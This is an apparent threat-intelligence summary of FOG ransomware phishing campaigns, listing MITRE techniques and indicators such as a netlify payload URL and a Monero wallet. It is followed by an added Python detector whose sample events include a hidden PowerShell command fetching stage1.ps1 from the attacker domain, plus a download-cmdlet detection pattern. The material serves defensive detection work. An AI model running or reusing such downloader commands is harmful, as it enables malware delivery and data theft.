In our analysis of FOG ransomware, we discovered nine samples uploaded to VirusTotal, linked to the Department of Government Efficiency (DOGE). These ransomware samples were distributed via email, showcasing the ongoing threat posed by FOG ransomware. The investigation revealed various attack vectors and the involvement of multiple sectors, highlighting the need for proactive cybersecurity measures.
Affected: FOG ransomware victims, technology sector, education sector, manufacturing sector, transportation sector, healthcare sector, retail sector.
Key points:
- FOG ransomware is being distributed through email and phishing attacks, notably using a ZIP file named "Pay Adjustment.zip".
- The detected samples include various binaries, specifically those with the .flocked extension.
- In total, 100 victims of FOG ransomware have been reported since January 2023, with significant activity in February.
- FOG ransomware targets both individuals and organizations, with victims spanning multiple sectors.
- The investigation identified various components of the ransomware payload, including scripts for data exfiltration and privilege escalation.
- Trend Vision One™ provides detection and proactive measures against FOG ransomware.
- Implementing network segmentation and maintaining secure backups are crucial recommendations for organizations.
MITRE Techniques:
- Initial Access (T1071.001): The LNK file in the ZIP file performs command execution upon being clicked, leading to the execution of a PowerShell script.
- Execution (T1059.001): The PowerShell script named "stage1.ps1" is downloaded and executed by the initial LNK file.
- Exfiltration Over Command and Control Channel (T1041): The Lootsubmit.ps1 script collects and exfiltrates sensitive system information to a remote server.
- Privilege Escalation (T1068): Ktool.exe exploits a vulnerability in the Intel Network Adapter Driver for privilege escalation.
- Defense Evasion (T1203): The ransomware checks for sandbox indicators to avoid detection before executing its payload.
Indicators of Compromise:
- [URL] hxxps://hilarious-trifle-d9182e.netlify[.]app
- [Monero Wallet Address] 8BejUQh2TAA5rUz3375hHM7JT8ND2i4u5hkVXc9Bcdw1PTrCrrDzayWBj6roJsE1EWBPGU4PMKohHWZUMopE8WkY7iA6UC1
- [File Name] Pay Adjustment.zip
- [File Name] stage1.ps1
- [File Name] Lootsubmit.ps1
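The following is an added example, not part of the report above or of any Trend Micro tooling, showing how a defender could turn the attack chain and indicators listed here into detection logic run over endpoint telemetry. It assumes simplified Sysmon-style process-creation and file-creation records; the sample events, the refanged form of the netlify[.]app domain and the threshold of 20 ".flocked" files per process are constructed for illustration.

```python
import re
from collections import Counter

# Indicators from the report (the URL is refanged: hxxps/[.] -> https/. for log matching).
IOC_DOMAIN = "hilarious-trifle-d9182e.netlify.app"
IOC_SCRIPTS = ("stage1.ps1", "lootsubmit.ps1")
RANSOM_EXT = ".flocked"
FLOCKED_THRESHOLD = 20  # assumed heuristic: this many renames from one process = mass encryption

# Constructed sample telemetry (not real victim data): an LNK-launched PowerShell stager,
# the exfiltration script, a benign PowerShell call, and a burst of .flocked file writes.
SAMPLE_EVENTS = [
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c iwr https://hilarious-trifle-d9182e.netlify.app/stage1.ps1"},
    {"type": "process", "parent": "powershell.exe", "image": "powershell.exe",
     "cmdline": "powershell -ep bypass -f C:\\Users\\Public\\Lootsubmit.ps1"},
    {"type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell Get-Date"},
    *[{"type": "file", "image": "svchost.exe", "path": f"C:\\Share\\doc{i}.docx.flocked"}
      for i in range(25)],
    {"type": "file", "image": "winword.exe", "path": "C:\\Share\\notes.docx"},
]

DOWNLOAD_CMDLET = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b")


def detect(events):
    """Return (alert_kind, detail) tuples for the FOG behaviours described in the report."""
    alerts = []
    flocked_by_proc = Counter()
    for ev in events:
        if ev["type"] == "process" and ev["image"].lower() == "powershell.exe":
            cmd = ev["cmdline"].lower()
            if IOC_DOMAIN in cmd or any(s in cmd for s in IOC_SCRIPTS):
                # Direct hit on a reported indicator (T1059.001 stager or T1041 exfil script).
                alerts.append(("ioc_match", ev["cmdline"]))
            elif ev["parent"].lower() == "explorer.exe" and DOWNLOAD_CMDLET.search(cmd):
                # Behavioural fallback: explorer.exe (i.e. a clicked LNK) spawning a downloader.
                alerts.append(("lnk_style_download", ev["cmdline"]))
        elif ev["type"] == "file" and ev["path"].lower().endswith(RANSOM_EXT):
            flocked_by_proc[ev["image"]] += 1
    for image, n in flocked_by_proc.items():
        if n >= FLOCKED_THRESHOLD:
            alerts.append(("mass_flocked_rename", f"{image} wrote {n} {RANSOM_EXT} files"))
    return alerts


if __name__ == "__main__":
    for kind, detail in detect(SAMPLE_EVENTS):
        print(f"[{kind}] {detail}")
```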